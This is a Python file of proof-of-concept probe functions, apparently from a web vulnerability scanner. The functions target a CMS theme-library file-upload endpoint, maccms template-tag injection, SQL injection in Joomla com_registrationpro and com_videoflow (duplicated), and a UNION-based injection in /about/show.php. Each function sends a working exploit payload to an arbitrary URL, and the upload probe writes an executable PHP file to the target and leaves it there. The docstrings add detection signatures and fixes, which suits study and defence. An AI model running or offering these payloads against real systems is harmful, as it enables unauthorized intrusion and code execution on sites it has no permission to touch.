def poc(url):
    """Probe whether the theme-library save endpoint writes an arbitrary file.

    A PHP file whose only output is ``md5(<plain>)`` is POSTed to
    ``save_file.php`` and then requested back; the probe is positive when the
    body of the second response contains ``cipher`` (the md5 of ``plain``).

    Args:
        url: Target base URL; ``http://`` is prepended when no scheme is given.

    Returns:
        ``True`` when the written file is served back and executed, ``False``
        otherwise (including on any request error, which is swallowed).

    Defender notes: a positive result means an unauthenticated POST wrote a
    file under ``/dapur/apps/app_theme/libs/``. The randomly named ``.php``
    file is NOT removed afterwards and remains on disk as an artifact; the
    POST carries ``Referer: http://localhost/``, which is a usable signature.
    """
    url = url if '://' in url else 'http://' + url
    path = url + '/dapur/apps/app_theme/libs/'
    # randomString / randomMD5 are helpers defined elsewhere in this module.
    filename = randomString(5) + '.php'
    upload_path = path + 'save_file.php'
    shell_path = path + filename
    plain, cipher = randomMD5()
    post_data = {
        'content': '<?php echo md5("{}");?>'.format(plain),
        'src': filename
    }
    # Presumably satisfies a Referer check on the endpoint — not verifiable here.
    header_data = {'Referer': 'http://localhost/'}
    try:
        r = requests.post(url=upload_path, data=post_data, headers=header_data, timeout=3)
        # Unlike the POST above, this request has no timeout.
        shell = requests.get(shell_path)
        # `is 200` is an identity comparison, not equality; it only holds because
        # CPython caches small ints (SyntaxWarning from Python 3.8 on).
        if r.status_code is 200 and cipher in shell.content:
            return True
    except Exception:
        return False
    return False
def poc(url):
    """Probe the ``vod-search`` page for server-side expansion of template tags.

    The search term ``wd`` is set to ``{if-A:die(md5(<plain>))}{endif-A}``;
    finding ``cipher`` (the md5 of ``plain``) in the response body indicates
    the tag was evaluated on the server.

    Args:
        url: Target base URL; ``http://`` is prepended when no scheme is given.

    Returns:
        The string ``'[maccms]' + url`` on a positive probe, ``False``
        otherwise. The two return types differ — callers should test truthiness.

    Defender notes: the literal ``{if-A:`` inside a query string is a clear
    signature for this probe. Template tags must not be expanded from request
    parameters.
    """
    if '://' not in url:
        url = 'http://' + url
    try:
        p, c = randomMD5()
        payload = "/index.php?m=vod-search&wd={if-A:die(md5(%s))}{endif-A}" % (p)
        # Redirects are not followed. There is no request timeout, so a slow host
        # blocks the caller; any exception is swallowed below.
        if c in requests.get(url + payload, allow_redirects=False).text:
            return '[maccms]' + url
    except Exception:
        pass
    return False
def poc(url):
    """Probe the ``com_registrationpro`` calendar view for error-based SQL injection.

    The ``year`` parameter is suffixed with an ``AND (SELECT ...)`` expression
    built around ``md5(<plain>)``; the probe is positive when ``cipher`` (the
    md5 of ``plain``) appears in the response, i.e. the database evaluated the
    injected expression and its value surfaced in the page or error output.

    Args:
        url: Target base URL; ``http://`` is prepended when no scheme is given.

    Returns:
        The current ``iterate_path`` entry when the marker is found; otherwise
        the function falls off the end of the loop and returns ``None``
        (other probes in this file return ``False``).

    Note: ``except Exception, e`` is Python 2 syntax; this block does not
    compile under Python 3.

    Defender notes: a positive result means ``year`` was concatenated into a
    SQL statement. Integer-casting the parameter or using a parameterized
    query prevents this; the ``INFORMATION_SCHEMA`` / ``RAND(0)`` fragment in
    a query string is a usable signature.
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # Fresh marker per iteration. randomMD5's argument is not shown here —
        # presumably a length/format selector; TODO confirm.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        # Entries that already carry a query string are skipped.
        if '?' in each:
            continue
        # Built from `url`, not `each`: the request target does not vary with the
        # iterated path, only the random marker does.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:  # Python 2 syntax; `e` is never used.
            pass
def poc(url):
    """Probe the ``com_videoflow`` search task for error-based SQL injection.

    The ``searchword`` parameter receives a URL-encoded ``') OR 1 GROUP BY
    CONCAT(...) HAVING MIN(0)#`` expression built around ``md5(<plain>)``;
    the probe is positive when ``cipher`` (the md5 of ``plain``) appears in
    the response, i.e. the database evaluated the expression and its value
    surfaced in the page or error output.

    Args:
        url: Target base URL; ``http://`` is prepended when no scheme is given.

    Returns:
        The current ``iterate_path`` entry when the marker is found; otherwise
        the function falls off the end of the loop and returns ``None``.

    Note: ``except Exception, e`` is Python 2 syntax; this block does not
    compile under Python 3.

    Defender notes: a positive result means ``searchword`` was concatenated
    into a SQL statement; a parameterized query prevents this. The encoded
    ``GROUP BY CONCAT`` / ``RAND(0)`` fragment in a query string is a usable
    signature.
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # Fresh marker per iteration. randomMD5's argument is not shown here —
        # presumably a length/format selector; TODO confirm.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(plain=plain)
        # Entries that already carry a query string are skipped.
        if '?' in each:
            continue
        # Built from `url`, not `each`: the request target does not vary with the
        # iterated path, only the random marker does.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:  # Python 2 syntax; `e` is never used.
            pass
def poc(url):
    """Probe the ``com_videoflow`` search task for error-based SQL injection.

    Functionally the same as the preceding ``com_videoflow`` probe (only the
    line wrapping of the ``.format`` call differs). The ``searchword``
    parameter receives a URL-encoded ``') OR 1 GROUP BY CONCAT(...) HAVING
    MIN(0)#`` expression built around ``md5(<plain>)``; the probe is positive
    when ``cipher`` (the md5 of ``plain``) appears in the response.

    Args:
        url: Target base URL; ``http://`` is prepended when no scheme is given.

    Returns:
        The current ``iterate_path`` entry when the marker is found; otherwise
        the function falls off the end of the loop and returns ``None``.

    Note: ``except Exception, e`` is Python 2 syntax; this block does not
    compile under Python 3.

    Defender notes: a positive result means ``searchword`` was concatenated
    into a SQL statement; a parameterized query prevents this.
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # Fresh marker per iteration. randomMD5's argument is not shown here —
        # presumably a length/format selector; TODO confirm.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(
            plain=plain)
        # Entries that already carry a query string are skipped.
        if '?' in each:
            continue
        # Built from `url`, not `each`: the request target does not vary with the
        # iterated path, only the random marker does.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:  # Python 2 syntax; `e` is never used.
            pass
def poc(url):
    """Probe ``/about/show.php`` for UNION-based SQL injection via ``id``.

    ``id`` receives ``-2864 UNION ALL SELECT`` followed by 27 comma-separated
    copies of ``md5(<plain>)``; the probe is positive when ``cipher`` (the md5
    of ``plain``) appears in a 200 response from any path yielded by
    ``iterate_path``.

    Args:
        url: Target base URL. Without a scheme, ``https://`` is prepended when
            the string contains ``:443``, otherwise ``http://``.

    Returns:
        The scheme-normalised ``url`` on a positive probe, ``False`` otherwise.
        The specific path that matched (``each``) is not returned.

    Defender notes: ``UNION ALL SELECT md5(`` in a query string is a clear
    signature. Integer-casting ``id`` or using a parameterized query closes
    this; request errors are swallowed, so the probe is silent on failure.
    """
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    plain, cipher = randomMD5()
    # Fill every selected column with the marker (original note: "verify with all
    # fields, increases results by 70%"); the comma after the 27th term is stripped.
    payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
    for each in iterate_path(url):
        # Try every sub-path (original note: "increases results by 20%").
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            if r.status_code == 200 and cipher in r.content:
                return url
        except Exception:
            pass  # Changed from break to pass (original note: "increases results by 10%").
    return False